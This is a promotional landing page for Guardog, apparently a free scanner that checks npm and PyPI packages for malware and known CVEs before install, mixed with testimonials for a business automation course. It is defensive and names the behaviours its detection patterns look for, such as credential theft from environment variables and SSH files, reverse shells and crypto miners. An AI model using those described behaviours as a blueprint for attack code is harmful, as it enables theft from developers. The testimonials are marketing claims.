Guardog: Package Security Scanner
Scan before you install. Know before it's too late.
Think of it as free antivirus for your code dependencies. It scans every package for hidden malware and checks live vulnerability databases for newly discovered threats. Install once, run it before you install anything.
Install once. Scan anything.
Copy the install command
One line. Copy it from the box below.
Run it in your terminal
It clones Guardog, installs dependencies, drops the Claude Code skill in the right place, and walks you through adding a free VirusTotal key. Done in under a minute.
Type /guardog before you install
In Claude Code: /guardog express npm. In terminal: node ~/guardog/src/index.js analyze express npm. You get SILENT, WHINE, or BARK.
Free antivirus for your packages. Gets smarter every day.
Scans the files you download
When you run Guardog, it reads the actual package code sitting on your disk. It checks for credential harvesters, obfuscated scripts, crypto miners, reverse shells, and 25+ other malicious patterns. No sample or summary. The real files.
Checks the internet for new threats daily
A package that was clean last month may have a critical CVE discovered today. Guardog queries live vulnerability databases every time you run it, so you are always checking against the latest known threats. Not a snapshot. Live data.
Three verdicts. No ambiguity.
Package passed all checks. Safe to install.
Suspicious signals found. Review before installing.
Dangerous. Do not install.
Want to learn how to do this?
Join the Business Automation Mastermind
A small, focused group of business owners who meet weekly to build real things, fast -- leaving more time to serve clients and be with the people you love.
Real reactions from Cohort 1
What members said after their sessions.
Sophia
Session 4
“We have like 55 signups for our masterclass and we've only launched maybe four days ago.”
Jenny
Session 3
“It took like 5 minutes! I just took the one which took me one year, and I said make an essence of that, and what would be the most interesting free webinar?”
Alla
Session 3
“It looks amazing, and everyone loves my website, and they can't believe that I've created it. I can't believe it myself.”
SunDari
Session 1
“I used to pay all these people; now I can do it myself.”
Ronnie
Session 2
“I already had a draft website and it created a link to my calendar, a link to my link tree, a hyperlink for my WhatsApp, all the same photos. This is like 90% of the way there to the kind of website that I want.”
Alla
Session 4
“I've been comparing myself to a bird who now has wings. I feel so free.”
Sophia
Session 4
“I was able to go in and create my full email marketing funnel. It took off so much of the work of creating the workflow.”
Johanna
Session 1
“I have particles floating in the background, a circle following my cursor, things glowing. I could not believe I built this in one session.”
Ronnie
Session 1
“It pulled in my calendar link, my WhatsApp, all my deck photos. This is 90% of the website I wanted. In 45 minutes.”
Aaqib
Session 2
“I got a functional contact form on the website using Resend. I managed to get that set up in like 20 minutes. So I'm pretty stoked.”
Pina Maria
Session 4
“I said change it and it changed my whole website in just one second. Everything worked, it was so easy.”
Johanna
Session 4
“I was so on fire and so motivated because so many pieces of the puzzle I've been working on since a long time are coming together.”
Jasmine
Session 2
“It was great. It's been something that I really want to do, so I'm super grateful. It's so easy and we can just keep building over time. It's epic.”
Aaqib
Session 3
“I did a whole target audience and persona building exercise. I can safely say that I feel addicted to Claude.”
Marina
Session 3
“It's really empowering to learn and to see, with all these different tools, what becomes possible.”
SunDari
Session 4
“Excited that I can just ask Claude anything and be guided and supported through it all.”
Quincee
Session 4
“The website's looking great. I did a brand photoshoot this past week and I feel like a brand new person digitally.”
Alla
Session 2
“I got my website online. Thank you so much, it was amazing.”
Quincee
Session 4
“I feel magnetic. I feel guided.”
Copy. Paste. Done.
In the Business Automation Mastermind, we run Guardog before installing anything new. One command in your terminal and it is ready to use in Claude Code and from the command line.
git clone https://github.com/josephtandle/guardog.git ~/guardog && cd ~/guardog && ./install.shRequires Git and Node.js. The installer handles everything else, including the optional VirusTotal setup. View on GitHub for the manual install path.
antivirus engines via VirusTotal (optional)
malicious code patterns detected
command to install
What Guardog checks
Four scanning layers run on every package. VirusTotal is optional but recommended. Everything else works without any setup.
Queries the Open Source Vulnerabilities database maintained by Google. Covers npm, PyPI, and hundreds of other ecosystems. Returns known CVEs with severity ratings.
Each CVE is scored: critical (+25), high (+15), medium (+5), low (+2). The scores stack into a total threat score that drives the final verdict.
OSV is a free, open API. CVE lookups work out of the box on every scan, no account needed.
Checks download counts, package age, maintainer count, and metadata signals. A package with 12 downloads published 3 days ago scores very differently than lodash.
Same reputation signals for Python packages. Age, downloads, maintainer history, and whether the project links to a real repository.
Checks whether the package links to a real GitHub repo. Missing repo, zero stars, and brand-new accounts all add to the threat score.
Detects patterns that read environment variables, AWS keys, SSH files, or browser credential stores and write them to network calls.
Flags eval(), Function(), fromCharCode(), and base64-encoded execution chains. Legitimate packages have no reason to hide what they do.
Detects mining library imports, CPU-pegging loops, and wallet address patterns embedded in install scripts.
Matches patterns that open outbound sockets, spawn shell processes, and establish persistence on the host system.
Scans postinstall, preinstall, and prepare scripts for suspicious network calls and file system writes outside the package directory.
Cross-references the package name against a list of popular packages. A name one character away from "express" or "react" is an immediate flag.
With a free VirusTotal API key, Guardog submits the package URL or file hash for scanning across 70+ AV engines simultaneously. Takes about 5 seconds.
4 requests per minute, 500 per day. More than sufficient for scanning packages before you install them. Sign up takes 2 minutes.
CVE lookups, reputation checks, and pattern analysis all run without a key. VirusTotal adds a deeper malware layer on top. Recommended but not required.
After install, type /guardog followed by any package name in Claude Code. Guardog runs the scan and Claude interprets the results in plain English.
SILENT means safe to install. WHINE means suspicious, review before installing. BARK means dangerous, do not install. No ambiguity.
node ~/guardog/src/index.js analyze lodash npm -- run it directly without Claude Code if you prefer.
P.S. Supply chain attacks through npm and PyPI have hit companies you have heard of. The packages look real. The names are close. The installs are silent. Guardog takes 3 seconds to run and costs nothing.